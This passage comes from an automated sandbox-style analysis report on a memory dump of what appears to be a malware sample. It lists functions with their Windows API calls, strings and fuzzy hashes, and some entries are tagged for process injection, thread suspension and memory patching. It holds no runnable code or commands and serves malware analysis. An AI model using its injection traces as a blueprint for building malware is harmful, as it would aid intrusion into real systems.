    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
